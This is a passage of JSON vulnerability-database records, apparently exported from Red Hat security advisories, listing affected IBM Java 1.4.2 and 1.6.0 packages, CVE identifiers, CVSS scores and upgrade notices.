"java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el5.x86_64.rpm", "packageName": "java-1.4.2-ibm-demo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "x86_64", "packageFilename": "java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el5.x86_64.rpm", "packageName": "java-1.4.2-ibm-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "x86_64", "packageFilename": "java-1.4.2-ibm-javacomm-1.4.2.13.11-1jpp.1.el5.x86_64.rpm", "packageName": "java-1.4.2-ibm-javacomm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "x86_64", "packageFilename": "java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el5.x86_64.rpm", "packageName": "java-1.4.2-ibm-src", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "x86_64", "packageFilename": "java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el5.x86_64.rpm", "packageName": "java-1.4.2-ibm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "ppc", "packageFilename": "java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el5.ppc.rpm", "packageName": "java-1.4.2-ibm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "ppc", "packageFilename": "java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el5.ppc.rpm", "packageName": "java-1.4.2-ibm-demo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "ppc", "packageFilename": "java-1.4.2-ibm-javacomm-1.4.2.13.11-1jpp.1.el5.ppc.rpm", "packageName": "java-1.4.2-ibm-javacomm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "ppc64", "packageFilename": "java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el5.ppc64.rpm", "packageName": "java-1.4.2-ibm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "ppc64", "packageFilename": "java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el5.ppc64.rpm", "packageName": "java-1.4.2-ibm-demo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "ppc64", "packageFilename": "java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el5.ppc64.rpm", "packageName": "java-1.4.2-ibm-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "ppc64", "packageFilename": "java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el5.ppc64.rpm", "packageName": "java-1.4.2-ibm-src", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "ppc", "packageFilename": "java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el5.ppc.rpm", "packageName": "java-1.4.2-ibm-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "ppc", "packageFilename": "java-1.4.2-ibm-jdbc-1.4.2.13.11-1jpp.1.el5.ppc.rpm", "packageName": "java-1.4.2-ibm-jdbc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "ppc", "packageFilename": "java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el5.ppc.rpm", "packageName": "java-1.4.2-ibm-src", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "ppc64", "packageFilename": "java-1.4.2-ibm-javacomm-1.4.2.13.11-1jpp.1.el5.ppc64.rpm", "packageName": "java-1.4.2-ibm-javacomm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "s390", "packageFilename": "java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el5.s390.rpm", "packageName": "java-1.4.2-ibm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "s390", "packageFilename": "java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el5.s390.rpm", "packageName": "java-1.4.2-ibm-demo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "s390", "packageFilename": "java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el5.s390.rpm", "packageName": "java-1.4.2-ibm-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "s390", "packageFilename": "java-1.4.2-ibm-jdbc-1.4.2.13.11-1jpp.1.el5.s390.rpm", "packageName": "java-1.4.2-ibm-jdbc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "s390x", "packageFilename": "java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el5.s390x.rpm", "packageName": "java-1.4.2-ibm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "s390x", "packageFilename": "java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el5.s390x.rpm", "packageName": "java-1.4.2-ibm-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "s390", "packageFilename": "java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el5.s390.rpm", "packageName": "java-1.4.2-ibm-src", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "s390x", "packageFilename": "java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el5.s390x.rpm", "packageName": "java-1.4.2-ibm-demo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "s390x", "packageFilename": "java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el5.s390x.rpm", "packageName": "java-1.4.2-ibm-src", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "ia64", "packageFilename": "java-1.4.2-ibm-1.4.2.13.11-1jpp.1.el5.ia64.rpm", "packageName": "java-1.4.2-ibm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "ia64", "packageFilename": "java-1.4.2-ibm-src-1.4.2.13.11-1jpp.1.el5.ia64.rpm", "packageName": "java-1.4.2-ibm-src", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "ia64", "packageFilename": "java-1.4.2-ibm-demo-1.4.2.13.11-1jpp.1.el5.ia64.rpm", "packageName": "java-1.4.2-ibm-demo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11-1jpp.1.el5", "arch": "ia64", "packageFilename": "java-1.4.2-ibm-devel-1.4.2.13.11-1jpp.1.el5.ia64.rpm", "packageName": "java-1.4.2-ibm-devel", "operator": "lt"}], "description": "The IBM Java SE version 1.4.2 release includes the IBM Java 1.4.2 Runtime\nEnvironment and the IBM Java 1.4.2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 1.4.2 Runtime\nEnvironment and the IBM Java 1.4.2 Software Development Kit. Detailed\nvulnerability descriptions are linked from the IBM \"Security alerts\" page,\nlisted in the References section. (CVE-2011-3389, CVE-2011-3545,\nCVE-2011-3547, CVE-2011-3548, CVE-2011-3549, CVE-2011-3552, CVE-2011-3556,\nCVE-2011-3557, CVE-2011-3560)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM Java 1.4.2 SR13-FP11 release. All running\ninstances of IBM Java must be restarted for this update to take effect.\n", "reporter": "RedHat", "published": "2012-01-09T05:00:00", "type": "redhat", "title": "(RHSA-2012:0006) Critical: java-1.4.2-ibm security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-3389", "CVE-2011-3545", "CVE-2011-3547", "CVE-2011-3548", "CVE-2011-3549", "CVE-2011-3552", "CVE-2011-3556", "CVE-2011-3557", "CVE-2011-3560"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:13:58", "id": "RHSA-2012:0006", "href": "https://access.redhat.com/errata/RHSA-2012:0006", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-06-09T10:35:14", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11.sap-1jpp.1.el5", "arch": "x86_64", "packageName": "java-1.4.2-ibm-sap-demo", "packageFilename": "java-1.4.2-ibm-sap-demo-1.4.2.13.11.sap-1jpp.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11.sap-1jpp.1.el5", "arch": "x86_64", "packageName": "java-1.4.2-ibm-sap", "packageFilename": "java-1.4.2-ibm-sap-1.4.2.13.11.sap-1jpp.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11.sap-1jpp.1.el5", "arch": "x86_64", "packageName": "java-1.4.2-ibm-sap-javacomm", "packageFilename": "java-1.4.2-ibm-sap-javacomm-1.4.2.13.11.sap-1jpp.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11.sap-1jpp.1.el5", "arch": "x86_64", "packageName": "java-1.4.2-ibm-sap-src", "packageFilename": "java-1.4.2-ibm-sap-src-1.4.2.13.11.sap-1jpp.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.4.2.13.11.sap-1jpp.1.el5", "arch": "x86_64", "packageName": "java-1.4.2-ibm-sap-devel", "packageFilename": "java-1.4.2-ibm-sap-devel-1.4.2.13.11.sap-1jpp.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.4.2.13.11.sap-1jpp.1.el6", "arch": "x86_64", "packageName": "java-1.4.2-ibm-sap-devel", "packageFilename": "java-1.4.2-ibm-sap-devel-1.4.2.13.11.sap-1jpp.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.4.2.13.11.sap-1jpp.1.el6", "arch": "x86_64", "packageName": "java-1.4.2-ibm-sap", "packageFilename": "java-1.4.2-ibm-sap-1.4.2.13.11.sap-1jpp.1.el6.x86_64.rpm", "operator": "lt"}], "description": "The IBM 1.4.2 SR13-FP11 Java release includes the IBM Java 1.4.2 Runtime\nEnvironment and the IBM Java 1.4.2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 1.4.2 Runtime\nEnvironment and the IBM Java 1.4.2 Software Development Kit. Detailed\nvulnerability descriptions are linked from the IBM \"Security alerts\" page,\nlisted in the References section. (CVE-2011-3389, CVE-2011-3545,\nCVE-2011-3547, CVE-2011-3548, CVE-2011-3549, CVE-2011-3552, CVE-2011-3556,\nCVE-2011-3557, CVE-2011-3560)\n\nAll users of java-1.4.2-ibm-sap are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP11 Java release. All running\ninstances of IBM Java must be restarted for this update to take effect.\n", "reporter": "RedHat", "published": "2012-02-29T05:00:00", "type": "redhat", "title": "(RHSA-2012:0343) Moderate: java-1.4.2-ibm-sap security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-3389", "CVE-2011-3545", "CVE-2011-3547", "CVE-2011-3548", "CVE-2011-3549", "CVE-2011-3552", "CVE-2011-3556", "CVE-2011-3557", "CVE-2011-3560"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-09T14:15:16", "id": "RHSA-2012:0343", "href": "https://access.redhat.com/errata/RHSA-2012:0343", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-06-07T05:59:01", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "i386", "packageName": "java-1.6.0-ibm", "packageFilename": "java-1.6.0-ibm-1.6.0.10.0-1jpp.2.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "i386", "packageName": "java-1.6.0-ibm-devel", "packageFilename": "java-1.6.0-ibm-devel-1.6.0.10.0-1jpp.2.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "i386", "packageName": "java-1.6.0-ibm-jdbc", "packageFilename": "java-1.6.0-ibm-jdbc-1.6.0.10.0-1jpp.2.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "i386", "packageName": "java-1.6.0-ibm-plugin", "packageFilename": "java-1.6.0-ibm-plugin-1.6.0.10.0-1jpp.2.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "i386", "packageName": "java-1.6.0-ibm-accessibility", "packageFilename": "java-1.6.0-ibm-accessibility-1.6.0.10.0-1jpp.2.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "i386", "packageName": "java-1.6.0-ibm-demo", "packageFilename": "java-1.6.0-ibm-demo-1.6.0.10.0-1jpp.2.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "i386", "packageName": "java-1.6.0-ibm-javacomm", "packageFilename": "java-1.6.0-ibm-javacomm-1.6.0.10.0-1jpp.2.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "i386", "packageName": "java-1.6.0-ibm-src", "packageFilename": "java-1.6.0-ibm-src-1.6.0.10.0-1jpp.2.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "x86_64", "packageName": "java-1.6.0-ibm", "packageFilename": "java-1.6.0-ibm-1.6.0.10.0-1jpp.2.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "x86_64", "packageName": "java-1.6.0-ibm-accessibility", "packageFilename": "java-1.6.0-ibm-accessibility-1.6.0.10.0-1jpp.2.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "x86_64", "packageName": "java-1.6.0-ibm-demo", "packageFilename": "java-1.6.0-ibm-demo-1.6.0.10.0-1jpp.2.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "x86_64", "packageName": "java-1.6.0-ibm-javacomm", "packageFilename": "java-1.6.0-ibm-javacomm-1.6.0.10.0-1jpp.2.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "x86_64", "packageName": "java-1.6.0-ibm-plugin", "packageFilename": "java-1.6.0-ibm-plugin-1.6.0.10.0-1jpp.2.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "x86_64", "packageName": "java-1.6.0-ibm-src", "packageFilename": "java-1.6.0-ibm-src-1.6.0.10.0-1jpp.2.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "x86_64", "packageName": "java-1.6.0-ibm-devel", "packageFilename": "java-1.6.0-ibm-devel-1.6.0.10.0-1jpp.2.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "x86_64", "packageName": "java-1.6.0-ibm-jdbc", "packageFilename": "java-1.6.0-ibm-jdbc-1.6.0.10.0-1jpp.2.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "ppc", "packageName": "java-1.6.0-ibm-devel", "packageFilename": "java-1.6.0-ibm-devel-1.6.0.10.0-1jpp.2.el5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "ppc", "packageName": "java-1.6.0-ibm-jdbc", "packageFilename": "java-1.6.0-ibm-jdbc-1.6.0.10.0-1jpp.2.el5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "ppc", "packageName": "java-1.6.0-ibm-src", "packageFilename": "java-1.6.0-ibm-src-1.6.0.10.0-1jpp.2.el5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "ppc64", "packageName": "java-1.6.0-ibm", "packageFilename": "java-1.6.0-ibm-1.6.0.10.0-1jpp.2.el5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "ppc64", "packageName": "java-1.6.0-ibm-demo", "packageFilename": "java-1.6.0-ibm-demo-1.6.0.10.0-1jpp.2.el5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "ppc64", "packageName": "java-1.6.0-ibm-devel", "packageFilename": "java-1.6.0-ibm-devel-1.6.0.10.0-1jpp.2.el5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "ppc64", "packageName": "java-1.6.0-ibm-jdbc", "packageFilename": "java-1.6.0-ibm-jdbc-1.6.0.10.0-1jpp.2.el5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "ppc", "packageName": "java-1.6.0-ibm", "packageFilename": "java-1.6.0-ibm-1.6.0.10.0-1jpp.2.el5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "ppc", "packageName": "java-1.6.0-ibm-accessibility", "packageFilename": "java-1.6.0-ibm-accessibility-1.6.0.10.0-1jpp.2.el5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "ppc", "packageName": "java-1.6.0-ibm-demo", "packageFilename": "java-1.6.0-ibm-demo-1.6.0.10.0-1jpp.2.el5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "ppc", "packageName": "java-1.6.0-ibm-javacomm", "packageFilename": "java-1.6.0-ibm-javacomm-1.6.0.10.0-1jpp.2.el5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "ppc", "packageName": "java-1.6.0-ibm-plugin", "packageFilename": "java-1.6.0-ibm-plugin-1.6.0.10.0-1jpp.2.el5.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "ppc64", "packageName": "java-1.6.0-ibm-javacomm", "packageFilename": "java-1.6.0-ibm-javacomm-1.6.0.10.0-1jpp.2.el5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "ppc64", "packageName": "java-1.6.0-ibm-src", "packageFilename": "java-1.6.0-ibm-src-1.6.0.10.0-1jpp.2.el5.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "s390", "packageName": "java-1.6.0-ibm", "packageFilename": "java-1.6.0-ibm-1.6.0.10.0-1jpp.2.el5.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "s390", "packageName": "java-1.6.0-ibm-demo", "packageFilename": "java-1.6.0-ibm-demo-1.6.0.10.0-1jpp.2.el5.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "s390", "packageName": "java-1.6.0-ibm-src", "packageFilename": "java-1.6.0-ibm-src-1.6.0.10.0-1jpp.2.el5.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "s390x", "packageName": "java-1.6.0-ibm-accessibility", "packageFilename": "java-1.6.0-ibm-accessibility-1.6.0.10.0-1jpp.2.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "s390x", "packageName": "java-1.6.0-ibm-devel", "packageFilename": "java-1.6.0-ibm-devel-1.6.0.10.0-1jpp.2.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "s390x", "packageName": "java-1.6.0-ibm-jdbc", "packageFilename": "java-1.6.0-ibm-jdbc-1.6.0.10.0-1jpp.2.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "s390", "packageName": "java-1.6.0-ibm-devel", "packageFilename": "java-1.6.0-ibm-devel-1.6.0.10.0-1jpp.2.el5.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "s390", "packageName": "java-1.6.0-ibm-jdbc", "packageFilename": "java-1.6.0-ibm-jdbc-1.6.0.10.0-1jpp.2.el5.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "s390x", "packageName": "java-1.6.0-ibm", "packageFilename": "java-1.6.0-ibm-1.6.0.10.0-1jpp.2.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "s390x", "packageName": "java-1.6.0-ibm-demo", "packageFilename": "java-1.6.0-ibm-demo-1.6.0.10.0-1jpp.2.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.6.0.10.0-1jpp.2.el5", "arch": "s390x", "packageName": "java-1.6.0-ibm-src", "packageFilename": "java-1.6.0-ibm-src-1.6.0.10.0-1jpp.2.el5.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "i686", "packageName": "java-1.6.0-ibm-devel", "packageFilename": "java-1.6.0-ibm-devel-1.6.0.10.0-1jpp.2.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "x86_64", "packageName": "java-1.6.0-ibm-demo", "packageFilename": "java-1.6.0-ibm-demo-1.6.0.10.0-1jpp.2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "x86_64", "packageName": "java-1.6.0-ibm-devel", "packageFilename": "java-1.6.0-ibm-devel-1.6.0.10.0-1jpp.2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "x86_64", "packageName": "java-1.6.0-ibm-javacomm", "packageFilename": "java-1.6.0-ibm-javacomm-1.6.0.10.0-1jpp.2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "x86_64", "packageName": "java-1.6.0-ibm-jdbc", "packageFilename": "java-1.6.0-ibm-jdbc-1.6.0.10.0-1jpp.2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "x86_64", "packageName": "java-1.6.0-ibm-plugin", "packageFilename": "java-1.6.0-ibm-plugin-1.6.0.10.0-1jpp.2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "x86_64", "packageName": "java-1.6.0-ibm", "packageFilename": "java-1.6.0-ibm-1.6.0.10.0-1jpp.2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "x86_64", "packageName": "java-1.6.0-ibm-src", "packageFilename": "java-1.6.0-ibm-src-1.6.0.10.0-1jpp.2.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "i686", "packageName": "java-1.6.0-ibm-demo", "packageFilename": "java-1.6.0-ibm-demo-1.6.0.10.0-1jpp.2.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "i686", "packageName": "java-1.6.0-ibm-javacomm", "packageFilename": "java-1.6.0-ibm-javacomm-1.6.0.10.0-1jpp.2.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "i686", "packageName": "java-1.6.0-ibm", "packageFilename": "java-1.6.0-ibm-1.6.0.10.0-1jpp.2.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "i686", "packageName": "java-1.6.0-ibm-plugin", "packageFilename": "java-1.6.0-ibm-plugin-1.6.0.10.0-1jpp.2.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "i686", "packageName": "java-1.6.0-ibm-jdbc", "packageFilename": "java-1.6.0-ibm-jdbc-1.6.0.10.0-1jpp.2.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "i686", "packageName": "java-1.6.0-ibm-src", "packageFilename": "java-1.6.0-ibm-src-1.6.0.10.0-1jpp.2.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "ppc", "packageName": "java-1.6.0-ibm-devel", "packageFilename": "java-1.6.0-ibm-devel-1.6.0.10.0-1jpp.2.el6.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "ppc64", "packageName": "java-1.6.0-ibm-src", "packageFilename": "java-1.6.0-ibm-src-1.6.0.10.0-1jpp.2.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "ppc64", "packageName": "java-1.6.0-ibm", "packageFilename": "java-1.6.0-ibm-1.6.0.10.0-1jpp.2.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.6.0.10.0-1jpp.2.el6", "arch": "ppc64", "packageName": "java-1.6.0-ibm-demo", "packageFilename": "java-1.6.0-ibm-demo-1.6.0.10.0-1jpp.2.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", 